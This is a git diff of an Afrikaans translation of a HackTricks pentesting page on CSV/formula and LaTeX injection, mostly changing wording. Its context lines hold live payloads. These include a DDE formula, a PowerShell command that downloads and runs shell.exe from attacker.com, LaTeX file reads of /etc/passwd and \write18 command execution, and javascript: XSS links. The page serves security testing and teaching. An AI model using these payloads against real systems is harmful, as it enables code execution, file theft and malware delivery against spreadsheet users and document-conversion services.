diff --git a/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg b/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg new file mode 100644 index 000000000..dae1ef8c6 Binary files /dev/null and b/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg differ diff --git a/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md b/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md index a706795d1..803586bb5 100644 --- a/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md +++ b/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md @@ -1,4 +1,4 @@ -# Formule/CSV/Doc/LaTeX/GhostScript Inspruiting +# Formule/CSV/Doc/LaTeX/GhostScript Insigting
@@ -6,22 +6,30 @@ Ander maniere om HackTricks te ondersteun: -* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐩 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Formule Inspruiting +**Probeer Hard Security Groep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Formule Insigting ### Inligting -As jou **inset** binne **CSV-lĂȘers** (of enige ander lĂȘer wat waarskynlik deur **Excel** geopen sal word) **weerspieĂ«l** word, kan jy moontlik Excel **formules** plaas wat uitgevoer sal word wanneer die gebruiker die lĂȘer **open** of wanneer die gebruiker op 'n skakel **klik** binne die Excel-blad. +As jou **inset** binne **CSV-lĂȘers** (of enige ander lĂȘer wat waarskynlik deur **Excel** geopen gaan word) **weerspieĂ«l** word, kan jy moontlik Excel **formules** plaas wat uitgevoer sal word wanneer die gebruiker die lĂȘer **open** of wanneer die gebruiker op 'n skakel **klik** binne die Excel-blad. {% hint style="danger" %} -Tans sal **Excel waarsku** (veral kere) die **gebruiker wanneer iets van buite die Excel gelaai word** om hom te verhoed om kwaadwillige aksies te onderneem. Daarom moet daar spesiale aandag aan sosiale ingenieurswese gegee word vir die finale lading. +Tans sal **Excel waarsku** (veral kere) die **gebruiker wanneer iets van buite Excel gelaai word** om hom te verhoed om kwaadwillige aksies te onderneem. Daarom moet daar spesiale aandag aan sosiale ingenieurswese gegee word vir die finale lading. {% endhint %} ### [Woordelys](https://github.com/payloadbox/csv-injection-payloads) @@ -39,10 +47,10 @@ DDE ("cmd";"/C calc";"!A0")A0 Die volgende voorbeeld is geneem van [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit) -Stel jou 'n sekuriteitsversteuring in 'n Studenterekordbestuurstelsel voor wat deur 'n CSV-inspuitingsaanval benut word. Die aanvaller se primĂȘre bedoeling is om die stelsel wat deur onderwysers gebruik word om studentbesonderhede te bestuur, te kompromiteer. Die metode behels dat die aanvaller 'n skadelike lading in die aansoek inspuit, spesifiek deur skadelike formules in te voer in velde bedoel vir studentbesonderhede. Die aanval ontvou as volg: +Stel jou voor 'n sekuriteitsversteuring in 'n Studenterekordbestuurstelsel word benut deur 'n CSV-inspuitingsaanval. Die aanvaller se primĂȘre bedoeling is om die stelsel wat deur onderwysers gebruik word om studentbesonderhede te bestuur, te kompromiteer. Die metode behels dat die aanvaller 'n skadelike lading in die aansoek inspuit, spesifiek deur skadelike formules in te voer in velde bedoel vir studentbesonderhede. Die aanval ontvou as volg: 1. **Inspuiting van Skadelike Lading:** -* Die aanvaller dien 'n studentbesonderheidsvorm in, maar sluit 'n formule in wat algemeen in spredingslyste gebruik word (bv., `=HYPERLINK("","Klik hier")`). +* Die aanvaller dien 'n studentbesonderheidsvorm in, maar sluit 'n formule in wat algemeen in spredingslyste gebruik word (bv., `=HYPERLINK("","Kliek hier")`). * Hierdie formule is ontwerp om 'n skakel te skep, maar dit wys na 'n skadelike bediener wat deur die aanvaller beheer word. 2. **Uitvoer van Gekompromiteerde Data:** * Onderwysers, onbewus van die kompromis, gebruik die funksionaliteit van die aansoek om die data na 'n CSV-lĂȘer uit te voer. @@ -52,7 +60,7 @@ Stel jou 'n sekuriteitsversteuring in 'n Studenterekordbestuurstelsel voor wat d * Na kliek, word sensitiewe data (moontlik insluitend besonderhede uit die spredingslys of die onderwyser se rekenaar) na die aanvaller se bediener gestuur. 4. **Data Log:** * Die aanvaller se bediener ontvang en log die sensitiewe data wat van die onderwyser se rekenaar gestuur is. -* Die aanvaller kan dan hierdie data vir verskeie skadelike doeleindes gebruik, wat die privaatheid en veiligheid van die studente en die instelling verder kompromiteer. +* Die aanvaller kan dan hierdie data gebruik vir verskeie skadelike doeleindes, wat die privaatheid en veiligheid van die studente en die instelling verder kompromiteer. ### RCE @@ -66,7 +74,7 @@ Wanneer 'n spredingslys met die skadelike lading oopgemaak word (en as die gebru ```markdown `=cmd|' /C calc'!xxx` ``` -Addisionele bevele kan ook uitgevoer word, soos die aflaai en uitvoer van 'n lĂȘer met behulp van PowerShell: +Eksekuteer ook addisionele bevele, soos die aflaai en uitvoer van 'n lĂȘer met behulp van PowerShell: ```bash =cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 ``` @@ -95,15 +103,15 @@ Google Sheets bied funksies wat uitgebuit kan word vir OOB data uitvoer: Gewoonlik gebruik die bedieners wat jy op die internet vind wat **LaTeX-kode na PDF omskakel** die **`pdflatex`**.\ Hierdie program gebruik 3 hoof eienskappe om opdraguitvoering toe te laat of te verhoed: -* **`--no-shell-escape`**: **Deaktiveer** die `\write18{opdrag}` konstruksie, selfs as dit in die texmf.cnf lĂȘer geaktiveer is. +* **`--no-shell-escape`**: **Deaktiveer** die `\write18{opdrag}` konstruk, selfs al is dit geaktiveer in die texmf.cnf lĂȘer. * **`--shell-restricted`**: Dieselfde as `--shell-escape`, maar **beperk** tot 'n 'veilige' stel **voorgedefinieerde** \*\*opdragte (\*\*Op Ubuntu 16.04 is die lys in `/usr/share/texmf/web2c/texmf.cnf`). -* **`--shell-escape`**: **Aktiveer** die `\write18{opdrag}` konstruksie. Die opdrag kan enige skel opdrag wees. Hierdie konstruksie word normaalweg verhoed vir veiligheidsredes. +* **`--shell-escape`**: **Aktiveer** die `\write18{opdrag}` konstruk. Die opdrag kan enige skel opdrag wees. Hierdie konstruk word normaalweg verhoed vir veiligheidsredes. Daar is egter ander maniere om opdragte uit te voer, dus om RCE te vermy is dit baie belangrik om `--shell-restricted` te gebruik. ### Lees lĂȘer -Jy mag nodig wees om inspuiting met omhulsels soos \[ of $ aan te pas. +Jy mag nodig wees om inspuiting aan te pas met omhulsels soos \[ of $. ```bash \input{/etc/passwd} \include{password} # load .tex file @@ -161,7 +169,7 @@ Die invoer van die opdrag sal na stdin omgelei word, gebruik 'n tydelike lĂȘer o ## Get the value of shell_escape_commands without needing to read pdfetex.ini \input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"} ``` -Indien jy enige LaTex-fout kry, oorweeg om base64 te gebruik om die resultaat te kry sonder slegte karakters. +Indien jy enige LaTex-fout kry, oorweeg om base64 te gebruik om die resultaat sonder slegte karakters te kry ```bash \immediate\write18{env | base64 > test.tex} \input{text.tex} @@ -171,7 +179,7 @@ Indien jy enige LaTex-fout kry, oorweeg om base64 te gebruik om die resultaat te \input|ls|base4 \input{|"/bin/hostname"} ``` -### Kruissite Skrifinjeksie +### Kruissite-skriping ```bash \url{javascript:alert(1)} \href{javascript:alert(1)}{placeholder} @@ -187,6 +195,12 @@ Indien jy enige LaTex-fout kry, oorweeg om base64 te gebruik om die resultaat te * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection) * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) +**Probeer Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} +
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! @@ -195,8 +209,8 @@ Ander maniere om HackTricks te ondersteun: * As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐩 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslaan. +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.